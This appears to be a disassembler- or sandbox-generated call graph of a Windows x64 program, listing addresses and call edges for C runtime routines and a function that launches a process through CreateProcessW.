7ff712764c15 _Yarn 19166 7ff712764d4e 19166->19165 19169 7ff71277a7f4 _fread_nolock 51 API calls 19166->19169 19168->19165 19168->19166 19170 7ff71277a7f4 19168->19170 19169->19165 19173 7ff71277a814 19170->19173 19174 7ff71277a83e 19173->19174 19185 7ff71277a80c 19173->19185 19175 7ff71277a84d __scrt_get_show_window_mode 19174->19175 19176 7ff71277a88a 19174->19176 19174->19185 19179 7ff71277b1d0 _set_fmode 13 API calls 19175->19179 19186 7ff712779ca8 EnterCriticalSection 19176->19186 19181 7ff71277a862 19179->19181 19183 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 19181->19183 19183->19185 19185->19168 19563 7ff71278d7ee 19564 7ff71278d807 19563->19564 19565 7ff71278d7fd 19563->19565 19567 7ff71277b290 LeaveCriticalSection 19565->19567 19578 7ff712779c04 19579 7ff712779c0f 19578->19579 19587 7ff7127821cc 19579->19587 19600 7ff71277b23c EnterCriticalSection 19587->19600 19605 7ff712764800 19606 7ff712764813 19605->19606 19607 7ff71276483f 19605->19607 19606->19607 19610 7ff712779754 19606->19610 19611 7ff712779769 19610->19611 19612 7ff712779762 19610->19612 19614 7ff71276482f 19611->19614 19619 7ff71277954c 19611->19619 19616 7ff71277958c 19612->19616 19626 7ff712779468 19616->19626 19634 7ff712779ca8 EnterCriticalSection 19619->19634 19633 7ff71277b23c EnterCriticalSection 19626->19633 19712 7ff71277c400 19717 7ff71277b23c EnterCriticalSection 19712->19717 17482 7ff71278033c 17493 7ff71277b23c EnterCriticalSection 17482->17493 17484 7ff71278034c 17485 7ff712787160 36 API calls 17484->17485 17486 7ff712780355 17485->17486 17487 7ff712780363 17486->17487 17488 7ff712780134 38 API calls 17486->17488 17489 7ff71277b290 BuildCatchObjectHelperInternal LeaveCriticalSection 17487->17489 17490 7ff71278035e 17488->17490 17491 7ff71278036f 17489->17491 17492 7ff712780234 GetStdHandle GetFileType 17490->17492 17492->17487 21514 7ff71277fd48 21515 7ff71277fd4d 21514->21515 21516 7ff71277fd62 21514->21516 21520 7ff71277fd68 21515->21520 21521 7ff71277fdaa 21520->21521 21522 7ff71277fdb2 21520->21522 21523 7ff712781270 __free_lconv_num 13 API calls 21521->21523 21524 7ff712781270 __free_lconv_num 13 API calls 21522->21524 21523->21522 21525 7ff71277fdbf 21524->21525 21526 7ff712781270 __free_lconv_num 13 API calls 21525->21526 21527 7ff71277fdcc 21526->21527 21528 7ff712781270 __free_lconv_num 13 API calls 21527->21528 21529 7ff71277fdd9 21528->21529 21530 7ff712781270 __free_lconv_num 13 API calls 21529->21530 21531 7ff71277fde6 21530->21531 21532 7ff712781270 __free_lconv_num 13 API calls 21531->21532 21533 7ff71277fdf3 21532->21533 21534 7ff712781270 __free_lconv_num 13 API calls 21533->21534 21535 7ff71277fe00 21534->21535 21536 7ff712781270 __free_lconv_num 13 API calls 21535->21536 21537 7ff71277fe0d 21536->21537 21538 7ff712781270 __free_lconv_num 13 API calls 21537->21538 21539 7ff71277fe1d 21538->21539 21540 7ff712781270 __free_lconv_num 13 API calls 21539->21540 21541 7ff71277fe2d 21540->21541 21546 7ff71277fc18 21541->21546 21560 7ff71277b23c EnterCriticalSection 21546->21560 18580 7ff712773778 18581 7ff712773788 18580->18581 18597 7ff71277cfe0 18581->18597 18583 7ff712773794 18603 7ff712773da4 18583->18603 18585 7ff7127737ac _RTC_Initialize 18595 7ff712773801 18585->18595 18608 7ff712773f54 18585->18608 18586 7ff7127743fc 7 API calls 18587 7ff71277382d 18586->18587 18589 7ff7127737c1 18611 7ff71277c828 18589->18611 18593 7ff7127737d6 18594 7ff71277d6ac 36 API calls 18593->18594 18594->18595 18595->18586 18596 7ff71277381d 18595->18596 18598 7ff71277cff1 18597->18598 18599 7ff71277cff9 18598->18599 18600 7ff71277b1d0 _set_fmode 13 API calls 18598->18600 18599->18583 18601 7ff71277d008 18600->18601 18602 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18601->18602 18602->18599 18604 7ff712773db5 18603->18604 18607 7ff712773dba __scrt_acquire_startup_lock 18603->18607 18605 7ff7127743fc 7 API calls 18604->18605 18604->18607 18606 7ff712773e2e 18605->18606 18607->18585 18635 7ff712773f18 18608->18635 18610 7ff712773f5d 18610->18589 18612 7ff7127737cd 18611->18612 18613 7ff71277c848 18611->18613 18612->18595 18634 7ff7127743a4 InitializeSListHead 18612->18634 18614 7ff71277c866 GetModuleFileNameW 18613->18614 18615 7ff71277c850 18613->18615 18619 7ff71277c891 18614->18619 18616 7ff71277b1d0 _set_fmode 13 API calls 18615->18616 18617 7ff71277c855 18616->18617 18618 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18617->18618 18618->18612 18650 7ff71277c7c8 18619->18650 18622 7ff71277c8ea 18626 7ff71277c936 18622->18626 18627 7ff71277c94f 18622->18627 18632 7ff71277c8de 18622->18632 18623 7ff71277c8d9 18624 7ff71277b1d0 _set_fmode 13 API calls 18623->18624 18624->18632 18625 7ff712781270 __free_lconv_num 13 API calls 18625->18612 18628 7ff712781270 __free_lconv_num 13 API calls 18626->18628 18630 7ff712781270 __free_lconv_num 13 API calls 18627->18630 18629 7ff71277c93f 18628->18629 18631 7ff712781270 __free_lconv_num 13 API calls 18629->18631 18630->18632 18633 7ff71277c94b 18631->18633 18632->18625 18633->18612 18636 7ff712773f32 18635->18636 18638 7ff712773f2b 18635->18638 18639 7ff71277ee20 18636->18639 18638->18610 18642 7ff71277ea64 18639->18642 18649 7ff71277b23c EnterCriticalSection 18642->18649 18651 7ff71277c7e0 18650->18651 18655 7ff71277c818 18650->18655 18652 7ff7127803c0 _set_fmode 13 API calls 18651->18652 18651->18655 18653 7ff71277c80e 18652->18653 18654 7ff712781270 __free_lconv_num 13 API calls 18653->18654 18654->18655 18655->18622 18655->18623 21698 7ff712764990 21699 7ff7127649c3 21698->21699 21700 7ff712765c50 67 API calls 21699->21700 21707 7ff712764a1b 21699->21707 21702 7ff7127649e6 21700->21702 21701 7ff7127736e0 std::_Xinvalid_argument 8 API calls 21703 7ff712764a89 21701->21703 21704 7ff712764a06 21702->21704 21702->21707 21708 7ff71277ab40 21702->21708 21704->21707 21712 7ff71277a118 21704->21712 21707->21701 21709 7ff71277ab70 21708->21709 21710 7ff71277a8bc 64 API calls 21709->21710 21711 7ff71277ab89 21710->21711 21711->21704 21713 7ff71277a12c 21712->21713 21714 7ff71277a141 21712->21714 21716 7ff71277b1d0 _set_fmode 13 API calls 21713->21716 21714->21713 21715 7ff71277a146 21714->21715 21721 7ff7127829a4 21715->21721 21718 7ff71277a131 21716->21718 21719 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 21718->21719 21720 7ff71277a13c 21719->21720 21720->21707 21722 7ff7127829d4 21721->21722 21725 7ff7127824ac 21722->21725 21724 7ff7127829ed 21724->21720 21726 7ff7127824c7 21725->21726 21727 7ff7127824f6 21725->21727 21728 7ff71277af40 _invalid_parameter_noinfo_noreturn 35 API calls 21726->21728 21735 7ff712779ca8 EnterCriticalSection 21727->21735 21730 7ff7127824e7 21728->21730 21730->21724 21736 7ff712764d90 21737 7ff712764dc7 21736->21737 21739 7ff712764e5d 21737->21739 21740 7ff712764e42 21737->21740 21744 7ff712764dd7 ctype 21737->21744 21738 7ff7127736e0 std::_Xinvalid_argument 8 API calls 21741 7ff712764fee 21738->21741 21743 7ff7127799bc 38 API calls 21739->21743 21754 7ff7127799bc 21740->21754 21749 7ff712764e7d _Yarn 21743->21749 21744->21738 21745 7ff712764fa0 21745->21744 21747 7ff712765067 21745->21747 21748 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 21747->21748 21750 7ff71276506c 21748->21750 21749->21745 21751 7ff7127799bc 38 API calls 21749->21751 21753 7ff71276501e 21749->21753 21775 7ff7127685f0 21749->21775 21751->21749 21752 7ff71277a4f8 37 API calls 21752->21753 21753->21745 21753->21752 21755 7ff7127799d8 21754->21755 21756 7ff7127799f6 21754->21756 21757 7ff71277b1d0 _set_fmode 13 API calls 21755->21757 21789 7ff712779ca8 EnterCriticalSection 21756->21789 21759 7ff7127799dd 21757->21759 21761 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 21759->21761 21765 7ff7127799e8 21761->21765 21765->21744 21776 7ff71276861f 21775->21776 21786 7ff712768750 21775->21786 21780 7ff7127686b3 21776->21780 21783 7ff712768677 21776->21783 21788 7ff71276866a _Yarn 21776->21788 21777 7ff712761210 37 API calls 21778 7ff712768756 21777->21778 21779 7ff712773708 std::_Facet_Register 37 API calls 21779->21788 21781 7ff712773708 std::_Facet_Register 37 API calls 21780->21781 21781->21788 21782 7ff71276874a 21785 7ff712761170 Concurrency::cancel_current_task 37 API calls 21782->21785 21783->21779 21783->21782 21784 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 21784->21782 21785->21786 21786->21777 21787 7ff712768706 _Yarn ctype 21787->21749 21788->21784 21788->21787 21972 7ff71278d6ad 21973 7ff71278d6bd 21972->21973 21976 7ff712779cb4 LeaveCriticalSection 21973->21976 17494 7ff7127800cc 17499 7ff712782144 17494->17499 17496 7ff7127800d5 17498 7ff7127800f2 __vcrt_uninitialize_ptd 17496->17498 17503 7ff71277ffe0 17496->17503 17500 7ff712782159 17499->17500 17501 7ff712782155 17499->17501 17500->17501 17512 7ff712781924 17500->17512 17501->17496 17504 7ff712780029 GetLastError 17503->17504 17507 7ff71277ffff _set_fmode 17503->17507 17505 7ff71278003c 17504->17505 17506 7ff71278005a SetLastError 17505->17506 17508 7ff712780057 17505->17508 17510 7ff71277fe60 _set_fmode 11 API calls 17505->17510 17509 7ff712780024 17506->17509 17507->17509 17522 7ff71277fe60 GetLastError 17507->17522 17508->17506 17509->17498 17510->17508 17513 7ff712781a14 17512->17513 17521 7ff71277b23c EnterCriticalSection 17513->17521 17515 7ff712781a22 VirtualProtect 17516 7ff712781ad0 17515->17516 17517 7ff71277c108 BuildCatchObjectHelperInternal 36 API calls 17516->17517 17518 7ff712781ad5 17517->17518 17519 7ff712781b15 17518->17519 17520 7ff712781924 __crtLCMapStringW 36 API calls 17518->17520 17519->17501 17520->17519 17523 7ff71277fe86 17522->17523 17524 7ff71277fe8c SetLastError 17523->17524 17540 7ff7127803c0 17523->17540 17525 7ff71277ff05 17524->17525 17525->17509 17528 7ff71277fec5 FlsSetValue 17531 7ff71277fee8 17528->17531 17532 7ff71277fed1 FlsSetValue 17528->17532 17529 7ff71277feb5 FlsSetValue 17547 7ff712781270 17529->17547 17553 7ff71277fc78 17531->17553 17534 7ff712781270 __free_lconv_num 7 API calls 17532->17534 17537 7ff71277fee6 SetLastError 17534->17537 17537->17525 17545 7ff7127803d1 _fread_nolock 17540->17545 17541 7ff712780422 17561 7ff71277b1d0 17541->17561 17542 7ff712780406 HeapAlloc 17543 7ff71277fea7 17542->17543 17542->17545 17543->17528 17543->17529 17545->17541 17545->17542 17558 7ff71277c370 17545->17558 17548 7ff712781275 HeapFree 17547->17548 17552 7ff71277fec3 17547->17552 17549 7ff712781290 GetLastError 17548->17549 17548->17552 17550 7ff71278129d __free_lconv_num 17549->17550 17551 7ff71277b1d0 _set_fmode 11 API calls 17550->17551 17551->17552 17552->17524 17570 7ff71277fb50 17553->17570 17564 7ff71277c3c0 17558->17564 17562 7ff71277ffe0 _set_fmode 13 API calls 17561->17562 17563 7ff71277b1d9 17562->17563 17563->17543 17569 7ff71277b23c EnterCriticalSection 17564->17569 17582 7ff71277b23c EnterCriticalSection 17570->17582 20359 7ff7127650e0 20360 7ff7127650fb 20359->20360 20361 7ff712765111 20360->20361 20363 7ff71277a4f8 20360->20363 20364 7ff71277a511 20363->20364 20365 7ff71277a52f 20363->20365 20366 7ff71277b1d0 _set_fmode 13 API calls 20364->20366 20375 7ff712779ca8 EnterCriticalSection 20365->20375 20368 7ff71277a516 20366->20368 20370 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 20368->20370 20372 7ff71277a521 20370->20372 20372->20361 18861 7ff712782114 VirtualProtect 20648 7ff712764850 20649 7ff712764861 20648->20649 20650 7ff7127648a4 20649->20650 20655 7ff71277a28c 20649->20655 20652 7ff712764882 20652->20650 20653 7ff712765d40 35 API calls 20652->20653 20654 7ff71276489b 20653->20654 20658 7ff71277a2ba 20655->20658 20656 7ff71277a2df 20657 7ff71277af40 _invalid_parameter_noinfo_noreturn 35 API calls 20656->20657 20661 7ff71277a308 20657->20661 20658->20656 20659 7ff71277a332 20658->20659 20662 7ff71277a164 20659->20662 20661->20652 20669 7ff712779ca8 EnterCriticalSection 20662->20669 17584 7ff71277385c 17605 7ff712773d68 17584->17605 17587 7ff7127739a8 17661 7ff7127743fc IsProcessorFeaturePresent 17587->17661 17588 7ff712773878 __scrt_acquire_startup_lock 17590 7ff7127739b2 17588->17590 17595 7ff712773896 __scrt_release_startup_lock 17588->17595 17591 7ff7127743fc 7 API calls 17590->17591 17593 7ff7127739bd BuildCatchObjectHelperInternal 17591->17593 17592 7ff7127738bb 17594 7ff712773941 17611 7ff712774544 17594->17611 17595->17592 17595->17594 17650 7ff71277cf68 17595->17650 17597 7ff712773946 17614 7ff7127643d0 17597->17614 17602 7ff712773969 17602->17593 17657 7ff712773eec 17602->17657 17606 7ff712773d70 17605->17606 17607 7ff712773d7c __scrt_dllmain_crt_thread_attach 17606->17607 17608 7ff712773d89 17607->17608 17610 7ff712773870 17607->17610 17608->17610 17668 7ff7127758e0 17608->17668 17610->17587 17610->17588 17695 7ff71278c750 17611->17695 17615 7ff7127643fe 17614->17615 17697 7ff712767f80 17615->17697 17617 7ff712764413 17618 7ff712767f80 37 API calls 17617->17618 17619 7ff712764427 17618->17619 17620 7ff712767f80 37 API calls 17619->17620 17621 7ff71276443b 17620->17621 17711 7ff712764170 17621->17711 17624 7ff712764170 142 API calls 17625 7ff712764468 17624->17625 17626 7ff712764170 142 API calls 17625->17626 17627 7ff71276447e 17626->17627 17729 7ff712769560 17627->17729 17631 7ff71276450f ctype 17632 7ff712769560 37 API calls 17631->17632 17648 7ff7127647b8 17631->17648 17634 7ff7127645da 17632->17634 17633 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 17635 7ff7127647be 17633->17635 17636 7ff712763fc0 40 API calls 17634->17636 17637 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 17635->17637 17644 7ff7127645e4 ctype 17636->17644 17638 7ff7127647c4 17637->17638 17639 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 17638->17639 17640 7ff7127647ca 17639->17640 17761 7ff712768110 17640->17761 17641 7ff7127647b3 17756 7ff71277b018 17641->17756 17643 7ff71276478f ctype 17747 7ff7127736e0 17643->17747 17644->17635 17644->17638 17644->17641 17644->17643 17648->17633 17651 7ff71277cf9e 17650->17651 17652 7ff71277cf7f 17650->17652 18575 7ff71277efe0 17651->18575 17652->17594 17655 7ff712774588 GetModuleHandleW 17656 7ff712774599 17655->17656 17656->17602 17659 7ff712773efd 17657->17659 17658 7ff712773980 17658->17592 17659->17658 17660 7ff7127758e0 7 API calls 17659->17660 17660->17658 17662 7ff712774422 _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 17661->17662 17663 7ff712774441 RtlCaptureContext RtlLookupFunctionEntry 17662->17663 17664 7ff71277446a RtlVirtualUnwind 17663->17664 17665 7ff7127744a6 __scrt_get_show_window_mode 17663->17665 17664->17665 17666 7ff7127744d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17665->17666 17667 7ff712774526 _invalid_parameter_noinfo_noreturn 17666->17667 17667->17590 17669 7ff7127758e8 17668->17669 17670 7ff7127758f2 17668->17670 17674 7ff712775ab8 17669->17674 17670->17610 17675 7ff712775ac7 17674->17675 17676 7ff7127758ed 17674->17676 17682 7ff712778ed4 17675->17682 17678 7ff712778d04 17676->17678 17679 7ff712778d2f 17678->17679 17680 7ff712778d33 17679->17680 17681 7ff712778d12 DeleteCriticalSection 17679->17681 17680->17670 17681->17679 17686 7ff712778d3c 17682->17686 17687 7ff712778e26 TlsFree 17686->17687 17693 7ff712778d80 __vcrt_InitializeCriticalSectionEx 17686->17693 17688 7ff712778dae LoadLibraryExW 17690 7ff712778e4d 17688->17690 17691 7ff712778dcf GetLastError 17688->17691 17689 7ff712778e6d GetProcAddress 17689->17687 17690->17689 17692 7ff712778e64 FreeLibrary 17690->17692 17691->17693 17692->17689 17693->17687 17693->17688 17693->17689 17694 7ff712778df1 LoadLibraryExW 17693->17694 17694->17690 17694->17693 17696 7ff71277455b GetStartupInfoW 17695->17696 17696->17597 17699 7ff712767fb0 17697->17699 17701 7ff7127680f5 17699->17701 17703 7ff712768057 _Yarn 17699->17703 17704 7ff71276808e 17699->17704 17705 7ff712768039 17699->17705 17706 7ff7127680fb 17699->17706 17789 7ff712761170 17701->17789 17703->17617 17707 7ff712773708 std::_Facet_Register 37 API calls 17704->17707 17705->17701 17780 7ff712773708 17705->17780 17795 7ff712761210 17706->17795 17707->17703 17710 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 17710->17701 17712 7ff7127641b3 __scrt_get_show_window_mode 17711->17712 17871 7ff712765f40 17712->17871 17714 7ff7127641ca 17715 7ff71276424d 17714->17715 17899 7ff712765680 17714->17899 17921 7ff7127653b0 17715->17921 17718 7ff71276420b 17915 7ff712765e40 17718->17915 17719 7ff712764278 17722 7ff7127736e0 std::_Xinvalid_argument 8 API calls 17719->17722 17723 7ff7127642c1 17722->17723 17723->17624 17724 7ff7127642d4 17925 7ff712761e70 17724->17925 17726 7ff712764316 17727 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 17726->17727 17728 7ff712764327 17727->17728 17730 7ff7127695ce 17729->17730 17733 7ff712769635 __scrt_get_show_window_mode 17730->17733 18536 7ff712768250 17730->18536 17732 7ff7127736e0 std::_Xinvalid_argument 8 API calls 17734 7ff712764506 17732->17734 17733->17732 17735 7ff712763fc0 17734->17735 17736 7ff71276403c 17735->17736 17737 7ff712769560 37 API calls 17736->17737 17738 7ff7127640a1 CreateProcessW 17737->17738 17739 7ff7127640ed CloseHandle CloseHandle 17738->17739 17740 7ff7127640e9 17738->17740 17739->17740 17742 7ff71276415f 17740->17742 17743 7ff71276413a ctype 17740->17743 17741 7ff7127736e0 std::_Xinvalid_argument 8 API calls 17744 7ff71276414e 17741->17744 17745 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 17742->17745 17743->17741 17744->17631 17746 7ff712764164 17745->17746 17748 7ff7127736e9 17747->17748 17749 7ff712774084 IsProcessorFeaturePresent 17748->17749 17750 7ff7127647a2 17748->17750 17751 7ff71277409c 17749->17751 17750->17655 18550 7ff71277427c RtlCaptureContext 17751->18550 17757 7ff71277aea4 _invalid_parameter_noinfo_noreturn 35 API calls 17756->17757 17758 7ff71277b031 17757->17758 17759 7ff71277b048 _invalid_parameter_noinfo_noreturn 17 API calls 17758->17759 17760 7ff71277b046 17759->17760 17762 7ff7127726ac std::_Lockit::_Lockit 39 API calls 17761->17762 17763 7ff712768140 17762->17763 17764 7ff7127726ac std::_Lockit::_Lockit 39 API calls 17763->17764 17769 7ff71276818f 17763->17769 17766 7ff712768165 17764->17766 17765 7ff7127681dc 17767 7ff712772724 std::_Lockit::~_Lockit LeaveCriticalSection 17765->17767 17770 7ff712772724 std::_Lockit::~_Lockit LeaveCriticalSection 17766->17770 17768 7ff712768220 17767->17768 17771 7ff7127736e0 std::_Xinvalid_argument 8 API calls 17768->17771 17769->17765 18555 7ff712768910 17769->18555 17770->17769 17772 7ff7127647e1 17771->17772 17775 7ff712768243 17777 7ff7127618b0 Concurrency::cancel_current_task 37 API calls 17775->17777 17776 7ff7127681f4 17778 7ff712772aac std::_Facet_Register 37 API calls 17776->17778 17779 7ff712768248 17777->17779 17778->17765 17782 7ff712773713 17780->17782 17781 7ff71276804e 17781->17703 17781->17710 17782->17781 17783 7ff71277c370 std::_Facet_Register 2 API calls 17782->17783 17784 7ff712773732 17782->17784 17783->17782 17785 7ff71277373d 17784->17785 17798 7ff7127728bc 17784->17798 17787 7ff712761170 Concurrency::cancel_current_task 37 API calls 17785->17787 17788 7ff712773743 17787->17788 17790 7ff71276117e Concurrency::cancel_current_task 17789->17790 17791 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 17790->17791 17792 7ff71276118f 17791->17792 17807 7ff71277538c 17792->17807 17794 7ff7127611b9 17794->17706 17863 7ff7127728dc 17795->17863 17799 7ff7127728ca std::bad_alloc::bad_alloc 17798->17799 17802 7ff7127755d0 17799->17802 17801 7ff7127728db 17803 7ff7127755ef 17802->17803 17804 7ff71277563a RaiseException 17803->17804 17805 7ff712775618 RtlPcToFileHeader 17803->17805 17804->17801 17806 7ff712775630 17805->17806 17806->17804 17808 7ff7127753ad 17807->17808 17809 7ff7127753e2 17807->17809 17808->17809 17811 7ff71277f000 17808->17811 17809->17794 17812 7ff71277f00d 17811->17812 17813 7ff71277f017 17811->17813 17812->17813 17818 7ff71277f032 17812->17818 17814 7ff71277b1d0 _set_fmode 13 API calls 17813->17814 17815 7ff71277f01e 17814->17815 17820 7ff71277aff8 17815->17820 17816 7ff71277f02a 17816->17809 17818->17816 17819 7ff71277b1d0 _set_fmode 13 API calls 17818->17819 17819->17815 17823 7ff71277aea4 17820->17823 17822 7ff71277b011 17822->17816 17824 7ff71277aecf 17823->17824 17827 7ff71277af40 17824->17827 17826 7ff71277aef6 17826->17822 17837 7ff71277ac74 17827->17837 17832 7ff71277af7b 17832->17826 17838 7ff71277accb 17837->17838 17839 7ff71277ac90 GetLastError 17837->17839 17838->17832 17843 7ff71277ace0 17838->17843 17840 7ff71277aca0 17839->17840 17850 7ff712780070 17840->17850 17844 7ff71277acfc GetLastError SetLastError 17843->17844 17845 7ff71277ad14 17843->17845 17844->17845 17845->17832 17846 7ff71277b048 IsProcessorFeaturePresent 17845->17846 17847 7ff71277b05b 17846->17847 17855 7ff71277ad2c 17847->17855 17851 7ff712780098 FlsGetValue 17850->17851 17853 7ff712780094 17850->17853 17851->17853 17852 7ff71277acbb SetLastError 17852->17838 17853->17852 17854 7ff71277fe60 _set_fmode 13 API calls 17853->17854 17854->17852 17856 7ff71277ad66 _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 17855->17856 17857 7ff71277ad8e RtlCaptureContext RtlLookupFunctionEntry 17856->17857 17858 7ff71277adda RtlVirtualUnwind 17857->17858 17859 7ff71277ae10 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17857->17859 17858->17859 17862 7ff71277ae62 _invalid_parameter_noinfo_noreturn 17859->17862 17860 7ff7127736e0 std::_Xinvalid_argument 8 API calls 17861 7ff71277ae81 GetCurrentProcess TerminateProcess 17860->17861 17862->17860 17868 7ff7127727b4 17863->17868 17866 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 17867 7ff7127728fe 17866->17867 17869 7ff71277538c __std_exception_copy 35 API calls 17868->17869 17870 7ff7127727e8 17869->17870 17870->17866 17872 7ff712773708 std::_Facet_Register 37 API calls 17871->17872 17873 7ff71276603f 17872->17873 17936 7ff712772aec 17873->17936 17878 7ff71276608e 17879 7ff712773708 std::_Facet_Register 37 API calls 17878->17879 17880 7ff71276610e 17879->17880 17881 7ff712772aec 43 API calls 17880->17881 17883 7ff71276611e 17881->17883 17882 7ff71276624f 17886 7ff712761e70 37 API calls 17882->17886 17965 7ff712772eb0 17883->17965 17888 7ff71276628f 17886->17888 17887 7ff71276619e 17973 7ff712765d40 17887->17973 17890 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 17888->17890 17892 7ff71276621e 17890->17892 17894 7ff712761e70 37 API calls 17892->17894 17898 7ff7127661cd 17892->17898 17893 7ff712768110 72 API calls 17893->17898 17895 7ff7127662e4 17894->17895 17896 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 17895->17896 17897 7ff7127662f5 17896->17897 17898->17714 17900 7ff7127656c5 17899->17900 17903 7ff7127656da 17900->17903 18434 7ff7127663f0 17900->18434 17901 7ff712765710 17904 7ff712765781 17901->17904 17908 7ff7127657c4 17901->17908 17903->17901 18430 7ff712764aa0 17903->18430 18450 7ff712772948 __uncaught_exceptions 17904->18450 17906 7ff712765786 17907 7ff712765792 17906->17907 18454 7ff712766550 17906->18454 17907->17718 17910 7ff712761e70 37 API calls 17908->17910 17911 7ff712765806 17910->17911 17912 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 17911->17912 17913 7ff712765817 17912->17913 17913->17718 17916 7ff712765e5a 17915->17916 17920 7ff712764215 17915->17920 18493 7ff712765c50 17916->18493 17918 7ff712765e94 17919 7ff7127798e0 65 API calls 17918->17919 17919->17920 17920->17715 17920->17724 17922 7ff7127653cd 17921->17922 17923 7ff712765e40 70 API calls 17922->17923 17924 7ff71276540a 17922->17924 17923->17924 17924->17719 17926 7ff712761ea0 17925->17926 17926->17926 18503 7ff7127684f0 17926->18503 17928 7ff712761eb4 18517 7ff7127614d0 17928->18517 17930 7ff712761ecd 17931 7ff712761f02 ctype 17930->17931 17932 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 17930->17932 17931->17726 17933 7ff712761f24 17932->17933 17934 7ff71277538c __std_exception_copy 35 API calls 17933->17934 17935 7ff712761f5d 17934->17935 17935->17726 17979 7ff7127726ac 17936->17979 17938 7ff712772b0e 17944 7ff712772b31 _Yarn 17938->17944 17987 7ff712772ce4 17938->17987 17940 7ff712772b26 17990 7ff712772d14 17940->17990 17943 7ff71276604f 17945 7ff712766620 17943->17945 17983 7ff712772724 17944->17983 17946 7ff71276665f 17945->17946 17947 7ff7127726ac std::_Lockit::_Lockit 39 API calls 17946->17947 17948 7ff71276666c 17947->17948 17949 7ff7127726ac std::_Lockit::_Lockit 39 API calls 17948->17949 17954 7ff7127666bb 17948->17954 17950 7ff712766691 17949->17950 17952 7ff712772724 std::_Lockit::~_Lockit LeaveCriticalSection 17950->17952 17951 7ff712772724 std::_Lockit::~_Lockit LeaveCriticalSection 17953 7ff71276674f 17951->17953 17952->17954 17962 7ff7127736e0 std::_Xinvalid_argument 8 API calls 17953->17962 17955 7ff712766705 17954->17955 18088 7ff712761b60 17954->18088 17955->17951 17958 7ff7127667a4 18119 7ff7127618b0 17958->18119 17959 7ff712766723 18116 7ff712772aac 17959->18116 17964 7ff712766070 17962->17964 17964->17878 17964->17882 17966 7ff712772ef6 17965->17966 17969 7ff712766195 17966->17969 18153 7ff71277b6e0 17966->18153 17969->17887 17969->17892 17971 7ff712772f44 17971->17969 18176 7ff7127798e0 17971->18176 17974 7ff712765dba 17973->17974 17975 7ff712765dda 17973->17975 18424 7ff712779c60 17974->18424 17977 7ff7127736e0 std::_Xinvalid_argument 8 API calls 17975->17977 17978 7ff712765e24 17977->17978 17978->17893 17980 7ff7127726bb 17979->17980 17981 7ff7127726c0 17979->17981 17994 7ff71277b2ac 17980->17994 17981->17938 17984 7ff71277272f LeaveCriticalSection 17983->17984 17986 7ff712772738 17983->17986 17986->17943 17988 7ff712773708 std::_Facet_Register 37 API calls 17987->17988 17989 7ff712772cf6 17988->17989 17989->17940 17991 7ff712772d39 17990->17991 17992 7ff712772d26 17990->17992 17991->17944 18033 7ff712773390 17992->18033 17997 7ff712781f6c 17994->17997 17998 7ff712781f7c 17997->17998 17999 7ff712781f98 17997->17999 18000 7ff712781924 __crtLCMapStringW 37 API calls 17998->18000 18021 7ff7127818ec 17999->18021 18000->17999 18002 7ff712781f9d 18003 7ff712781fc6 18002->18003 18004 7ff712781924 __crtLCMapStringW 37 API calls 18002->18004 18005 7ff712781fef 18003->18005 18006 7ff712781924 __crtLCMapStringW 37 API calls 18003->18006 18004->18003 18007 7ff712782018 18005->18007 18008 7ff712781924 __crtLCMapStringW 37 API calls 18005->18008 18006->18005 18009 7ff712782041 18007->18009 18010 7ff712781924 __crtLCMapStringW 37 API calls 18007->18010 18008->18007 18011 7ff71278206a 18009->18011 18012 7ff712781924 __crtLCMapStringW 37 API calls 18009->18012 18010->18009 18013 7ff712782093 18011->18013 18014 7ff712781924 __crtLCMapStringW 37 API calls 18011->18014 18012->18011 18015 7ff712781924 __crtLCMapStringW 37 API calls 18013->18015 18016 7ff7127820bc 18013->18016 18014->18013 18015->18016 18017 7ff7127820e5 18016->18017 18018 7ff712781924 __crtLCMapStringW 37 API calls 18016->18018 18019 7ff71277b2b5 EnterCriticalSection 18017->18019 18020 7ff712781924 __crtLCMapStringW 37 API calls 18017->18020 18018->18017 18020->18019 18022 7ff7127818f9 18021->18022 18024 7ff7127818fc 18021->18024 18022->18002 18023 7ff712781901 18023->18002 18024->18023 18032 7ff71277b23c EnterCriticalSection 18024->18032 18026 7ff712781a22 VirtualProtect 18027 7ff712781ad0 18026->18027 18028 7ff71277c108 BuildCatchObjectHelperInternal 36 API calls 18027->18028 18029 7ff712781ad5 18028->18029 18030 7ff712781b15 18029->18030 18031 7ff712781924 __crtLCMapStringW 37 API calls 18029->18031 18030->18002 18031->18030 18034 7ff71277339e EncodePointer 18033->18034 18035 7ff7127733c5 18033->18035 18034->17991 18038 7ff71277c108 18035->18038 18047 7ff7127856a4 18038->18047 18073 7ff71278565c 18047->18073 18078 7ff71277b23c EnterCriticalSection 18073->18078 18089 7ff712761b8c 18088->18089 18115 7ff712761cc0 18088->18115 18090 7ff712773708 std::_Facet_Register 37 API calls 18089->18090 18089->18115 18091 7ff712761b9f 18090->18091 18092 7ff7127726ac std::_Lockit::_Lockit 39 API calls 18091->18092 18093 7ff712761bd0 18092->18093 18094 7ff712761c0c 18093->18094 18095 7ff712761cde 18093->18095 18125 7ff712772c5c 18094->18125 18130 7ff712772924 18095->18130 18115->17958 18115->17959 18117 7ff712773708 std::_Facet_Register 37 API calls 18116->18117 18118 7ff712772abf 18117->18118 